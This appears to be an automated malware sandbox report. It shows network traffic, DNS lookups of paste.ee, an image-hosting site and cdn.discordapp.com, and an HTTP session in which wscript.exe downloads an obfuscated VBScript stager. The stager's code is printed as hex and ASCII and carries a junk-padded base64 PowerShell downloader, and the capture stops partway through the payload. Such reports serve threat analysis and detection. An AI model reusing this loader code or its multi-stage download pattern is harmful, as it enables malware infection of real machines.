        May 27, 2024 15:21:14.662136078 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.662408113 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.662420034 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.662475109 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.662489891 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.662539959 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.663206100 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.663219929 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.663265944 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.663274050 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.663312912 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.742656946 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.742676973 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.742794991 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.742803097 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.742851019 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.745696068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.745709896 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.745769978 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.745774984 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.745819092 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.746054888 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.746072054 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.746121883 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.746128082 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.746174097 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.746516943 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.746539116 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.746588945 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.746594906 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.746623993 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.746644020 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.750866890 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.750885010 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.750930071 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.750935078 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.750967026 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.750983000 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.751579046 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.751597881 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.751647949 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.751653910 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.751698017 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.751735926 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.751749992 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.751796961 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.751801968 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.751844883 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.752098083 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.752114058 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.752163887 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.752167940 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.752211094 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.849461079 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.849495888 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.849721909 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.849752903 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.849816084 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.849826097 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.849848032 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.849893093 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.849899054 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.849935055 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.849956989 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.850153923 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.850173950 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.850210905 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.850215912 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.850244999 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.850270987 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.850613117 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.850632906 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.850682974 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.850687981 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.850718021 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.850744009 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851053953 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851074934 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851123095 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851126909 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851165056 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851191044 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851356030 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851377964 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851418018 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851423979 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851453066 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851476908 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851862907 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851882935 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851924896 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851928949 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.851960897 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.851978064 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.852147102 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.852166891 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.852209091 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.852215052 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.852237940 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.852266073 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.940398932 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.940426111 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.940556049 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.940568924 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.940617085 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.940818071 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.940835953 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.940875053 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.940881968 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.940911055 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.940922022 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.941268921 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.941291094 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.941340923 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.941346884 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.941394091 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.941653013 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.941670895 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.941716909 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.941721916 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.941751003 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.941773891 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.942081928 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942099094 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942146063 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.942151070 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942181110 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.942202091 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.942425966 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942440987 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942497015 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.942502975 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942555904 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.942833900 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942850113 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942903042 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.942912102 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.942960024 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.943212986 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.943228006 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.943280935 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:14.943288088 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:14.943335056 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.061481953 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.061508894 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.061842918 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.061856031 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.061966896 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.061985970 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.062057018 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.062057018 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.062063932 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.062120914 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.062120914 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.062496901 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.062511921 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.062664986 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.062671900 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.062716961 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.063153028 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.063167095 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.063220024 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.063225031 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.063278913 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.063604116 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.063620090 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.063677073 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.063683033 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.063724995 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.064090967 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064106941 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064157009 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.064163923 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064203024 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.064465046 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064480066 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064528942 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.064536095 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064573050 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.064810991 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064826965 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064877033 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.064882994 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.064923048 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.154793024 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.154814005 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.154912949 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.154921055 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155015945 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155042887 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155065060 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.155071974 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155081034 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.155121088 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.155365944 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155380011 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155426979 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.155433893 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155472040 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.155709982 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155723095 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155766964 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.155771971 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.155810118 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.156346083 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.156361103 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.156404018 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.156409979 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.156446934 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.156466007 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.156522036 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.156527996 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.156538010 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:15.156570911 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:15.157685041 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:22.420089960 CEST49720443192.168.2.6162.159.134.233
        May 27, 2024 15:21:22.420114040 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:22.420295000 CEST49720443192.168.2.6162.159.134.233
        May 27, 2024 15:21:22.420912027 CEST49720443192.168.2.6162.159.134.233
        May 27, 2024 15:21:22.420928001 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:22.885155916 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:22.885715961 CEST49720443192.168.2.6162.159.134.233
        May 27, 2024 15:21:22.887219906 CEST49720443192.168.2.6162.159.134.233
        May 27, 2024 15:21:22.887228012 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:22.887432098 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:22.889024973 CEST49720443192.168.2.6162.159.134.233
        May 27, 2024 15:21:22.930500031 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:23.009632111 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:23.009692907 CEST44349720162.159.134.233192.168.2.6
        May 27, 2024 15:21:23.009835958 CEST49720443192.168.2.6162.159.134.233
        May 27, 2024 15:21:23.015299082 CEST49720443192.168.2.6162.159.134.233
        TimestampSource PortDest PortSource IPDest IP
        May 27, 2024 15:21:03.274307013 CEST5720553192.168.2.61.1.1.1
        May 27, 2024 15:21:03.286761999 CEST53572051.1.1.1192.168.2.6
        May 27, 2024 15:21:06.911196947 CEST5393753192.168.2.61.1.1.1
        May 27, 2024 15:21:06.973978043 CEST53539371.1.1.1192.168.2.6
        May 27, 2024 15:21:22.411400080 CEST5636653192.168.2.61.1.1.1
        May 27, 2024 15:21:22.419378996 CEST53563661.1.1.1192.168.2.6
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        May 27, 2024 15:21:03.274307013 CEST192.168.2.61.1.1.10xa19aStandard query (0)paste.eeA (IP address)IN (0x0001)false
        May 27, 2024 15:21:06.911196947 CEST192.168.2.61.1.1.10x22d0Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
        May 27, 2024 15:21:22.411400080 CEST192.168.2.61.1.1.10x26b2Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        May 27, 2024 15:21:03.286761999 CEST1.1.1.1192.168.2.60xa19aNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
        May 27, 2024 15:21:03.286761999 CEST1.1.1.1192.168.2.60xa19aNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
        May 27, 2024 15:21:06.973978043 CEST1.1.1.1192.168.2.60x22d0No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
        May 27, 2024 15:21:06.973978043 CEST1.1.1.1192.168.2.60x22d0No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
        May 27, 2024 15:21:22.419378996 CEST1.1.1.1192.168.2.60x26b2No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:22.419378996 CEST1.1.1.1192.168.2.60x26b2No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:22.419378996 CEST1.1.1.1192.168.2.60x26b2No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:22.419378996 CEST1.1.1.1192.168.2.60x26b2No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:22.419378996 CEST1.1.1.1192.168.2.60x26b2No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
        • paste.ee
        • uploaddeimagens.com.br
        • cdn.discordapp.com
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.649710188.114.96.34436272C:\Windows\System32\wscript.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:21:04 UTC319OUTGET /d/c2iY1 HTTP/1.1
        Accept: */*
        Accept-Language: en-ch
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: paste.ee
        Connection: Keep-Alive
        2024-05-27 13:21:04 UTC1236INHTTP/1.1 200 OK
        Date: Mon, 27 May 2024 13:21:04 GMT
        Content-Type: text/plain; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=2592000
        strict-transport-security: max-age=63072000
        x-frame-options: DENY
        x-content-type-options: nosniff
        x-xss-protection: 1; mode=block
        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2Bo7fVw%2BT1nc2ixu472KKQObT0YE4GIIujq1C%2FfyPod7snse0YCrX3MougCgijKtK4S2yCJK26yDhDYGBIupbDdTQeipkDcDEVBi0a6lMvfaAROCBdjr%2BebOtw%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 88a64e50d84fc445-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:21:04 UTC133INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 7a 6f 6f 74 6f 6d 69 73 74 61 20 2c 20 72 65 70 75 6e 68 61 6e 74 65 20 2c 20 61 6e 6f 73 69 64 61 64 65 20 2c 20 72 75 69 76 61 20 2c 20 64 69 73 73 6f 6e 61 6e 74 65 20 2c 20 43 61 6d 61 20 2c 20 64 69 73 73 6f 6e 61 6e 74 65 31 0d 0a 20 20 20 20 20 72 65 70 75 6e 68 61 6e 74 65 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 61 6e 6f 73 69 64 61 64
        Data Ascii: 1f7f dim zootomista , repunhante , anosidade , ruiva , dissonante , Cama , dissonante1 repunhante = " " anosidad
        2024-05-27 13:21:04 UTC1369INData Raw: 65 20 20 3d 20 22 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74
        Data Ascii: e = "" & ruiva & repunhante & ruiva & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBt
        2024-05-27 13:21:04 UTC1369INData Raw: 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67
        Data Ascii: HUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & ruiva & repunhante & ruiva & "gBvDgTreHIDgTre" & ruiva & repunhante & ruiva & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDg
        2024-05-27 13:21:04 UTC1369INData Raw: 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67 54 72 65 76 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 51 42 7a 44 67 54 72 65 43 38 44 67 54 72 65 4d 44 67 54
        Data Ascii: DgTreGQDgTre" & ruiva & repunhante & ruiva & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & ruiva & repunhante & ruiva & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTre" & ruiva & repunhante & ruiva & "QBzDgTreC8DgTreMDgT
        2024-05-27 13:21:04 UTC1369INData Raw: 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54
        Data Ascii: unhante & ruiva & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgT
